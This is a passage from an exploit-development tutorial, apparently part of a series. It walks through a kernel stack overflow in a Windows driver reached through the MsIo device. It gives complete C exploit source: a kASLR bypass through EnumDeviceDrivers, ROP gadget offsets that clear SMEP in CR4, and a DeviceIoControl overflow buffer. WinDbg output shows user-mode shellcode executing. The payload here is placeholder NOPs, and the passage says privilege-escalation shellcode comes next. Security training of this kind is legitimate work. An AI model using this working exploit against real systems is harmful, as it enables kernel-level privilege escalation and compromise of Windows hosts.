kASLR (Kernel Address Space Layout Randomization) is a security feature that randomises the kernel's memory layout to try and mitigate exploitation techniques.
To create our ROP chain we need to defeat kASLR. When we are running code in medium integrity we can call the EnumDeviceDrivers Win32 API.
In our exploit code we need to add the psapi.h header:
#include<psapi.h>
The EnumDeviceDrivers Win32 API retrieves the loaded address for each device driver in the system. Luckily for us the kernel module is the first that is loaded:
The GetKernelBase() function retrieves the base address of the kernel module in memory.
It uses the EnumDeviceDrivers function to enumerate the loaded device drivers and retrieves the base addresses of the drivers into the drivers array. The function then returns the base address of the first driver, which is assumed to be the kernel module.
We can take this base address and add our offsets we discovered in the previous section to create our rop gadgets:
// get the kernel base addressuint64_t kernelBase =GetKernelBase();printf("[+] Kernel base is: 0x%p\n", kernelBase);// rop gadgetsuint64_t POP_RCX = kernelBase +0x3c66ce;uint64_t MOV_CR4_RCX = kernelBase +0x3d6325;
The exploit buffer can be formed as such:
// index for rop chainuint64_t index =0;// the exploit bufferchar buffer[len];memset(buffer,0x41, len);// get a pointer to the offset for the rop chainuint64_t* rop = (uint64_t*)((uint64_t)buffer + offset);// the rop chain*(rop + index++) = POP_RCX;*(rop + index++) = (uint64_t)0x050678;*(rop + index++) = MOV_CR4_RCX;// the return address to our shellcode*(rop + index++) = (uint64_t)alloc;
In this code snippet, the ROP chain is being constructed in the buffer array. The index variable on line 2 keeps track of the current index in the ROP chain.
First, the rop pointer is calculated (on line 9) by adding the offset value to the base address of buffer. This points to the location in the buffer where the ROP chain will be constructed.
Next, specific ROP gadgets are placed in the ROP chain, lines 12 through 14.
The return address to the alloc shellcode is set in the ROP chain on lin 17.
Debugging
We can debug our exploit so far. If we have defeated kASLR, DEP and SMEP we should be able to execute our shellcode, albeit a chain of nop instructions.
The entire code is shown below:
#include<iostream>#include<windows.h>#include<psapi.h>#defineMSIO_SYM_LINK"\\\\.\\MsIo"#defineARRAY_SIZE1024uint64_tGetKernelBase(){ LPVOID drivers[ARRAY_SIZE]; DWORD cbNeeded;EnumDeviceDrivers(drivers,sizeof(drivers),&cbNeeded);return (uint64_t)drivers[0];}intmain(){// get a handle to the driver using the Symbolic link HANDLE hDevice = CreateFileA(MSIO_SYM_LINK, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED, NULL);
// if CreateFileA fails the handle will be -0x1if (hDevice == (HANDLE)-0x1) {printf("[+] Driver handle: 0x%p\n", hDevice);printf("[!] Unable to get a handle to the driver.\n");return1; }else {// the IOCTL codeunsignedint ioCode =0x80102040;// the overflow offsetconstsize_t offset =72;// 8 instructionsconstunsignedchar shellcode[8] = { 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xcc };// allocate memory for the shellcode LPVOID alloc =VirtualAlloc(NULL,sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);if (!alloc) {printf("[!] Unable to allocate memory for the shellcode. Error code: %d\n", GetLastError());return1; }printf("[+] Memory allocated: 0x%p\n", alloc);// copy the shellcode in to the memoryRtlMoveMemory(alloc, shellcode,sizeof(shellcode));printf("[+] Shellcode copied to: 0x%p\n", alloc);// get the kernel base addressuint64_t kernelBase =GetKernelBase();printf("[+] Kernel base is: 0x%p\n", kernelBase);// the rop gadgetsuint64_t POP_RCX = kernelBase +0x3c66ce;uint64_t MOV_CR4_RCX = kernelBase +0x3d6325;// index for rop chainuint64_t index =0;// the exploit bufferchar buffer[250];memset(buffer,0x41,250);// get a pointer to the offset for the rop chainuint64_t* rop = (uint64_t*)((uint64_t)buffer + offset);// the rop chain*(rop + index++) = POP_RCX;*(rop + index++) = (uint64_t)0x050678;*(rop + index++) = MOV_CR4_RCX;// the return address to our shellcode*(rop + index++) = (uint64_t)alloc;printf("[!] Press enter when ready...");getchar();// send the buffer DWORD bytesRet;DeviceIoControl(hDevice, (DWORD)ioCode, (LPVOID)buffer,250,NULL,0,&bytesRet,NULL); }return0;}
Compile the code, copy it to the target host, ensure the driver is running and attach the debugger.
We are going to step through the ROP chain, first we can add a breakpoint to our first gadget. Break into the host and add the following breakpoint:
0: kd> bp nt+0x3c66ce
Continue the debugger with the g command, then run the exploit on the target host, the breakpoint should get hit:
0: kd> g
Breakpoint 0 hit
nt!KiCalibrateTimeAdjustment+0xea:
fffff802`550526ce 59 pop rcx
Enter the p command twice to execute our first gadget then examine the rcx register:
1: kd> r rcx
rcx=0000000000050678
We can see that our intender cr4 value has been placed in rcx. Next, look at the value in cr4:
1: kd> r cr4
cr4=00000000001506f8
As expected, this shows that SMEP is enabled. Enter the p command twice to execute our second gadget then re-examine the cr4 register:
1: kd> r cr4
cr4=0000000000050678
This shows that SMEP has been disabled. If we look at the next instruction we will observe that our shellcode in user mode is about to be executed:
1: kd> u rip
000002b5`67f90000 90 nop
000002b5`67f90001 90 nop
000002b5`67f90002 90 nop
000002b5`67f90003 90 nop
000002b5`67f90004 90 nop
000002b5`67f90005 90 nop
000002b5`67f90006 90 nop
000002b5`67f90007 cc int 3
Press g to continue, and the debugger should hit our int3 breakpoint:
1: kd> g
Break instruction exception - code 80000003 (first chance)
000002b5`67f90007 cc int 3
This is good news! We have defeated DEP, kASLR and SMEP to execute our shellcode in user space. All we have left to do is to exploit this with some privilege escalation shellcode.
We will need to reboot the target host, if we continue execution the OS will crash. Issue the .reboot command to reboot the OS.
